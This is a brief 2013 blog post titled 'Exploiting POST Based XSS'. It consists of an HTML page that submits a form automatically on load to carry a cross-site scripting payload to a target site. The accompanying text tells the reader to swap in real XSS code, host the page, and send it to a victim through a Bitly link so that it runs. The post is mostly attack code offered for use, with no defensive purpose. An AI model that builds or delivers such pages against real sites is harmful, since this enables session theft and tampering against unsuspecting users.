<body onload=”xss();”> <form method=post name=f action=”http://www.example.com/whatever.php”> <input name=”abcd” value=”<SCRIPT>alert(’XSS’)</SCRIPT>”> <input type=”submit” class=”button” name=”s”> </form> <script> function xss() { document.f.s.click(); } </script> </body>
Monday, February 11, 2013
Exploiting POST Based XSS
Found this on the web somewhere and wanted to post it here to have a place to reference it. place the actual XSS in the "abcd" section and place it on a webserver somwhere. Bitly link the exploit code to your target and have it execute.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment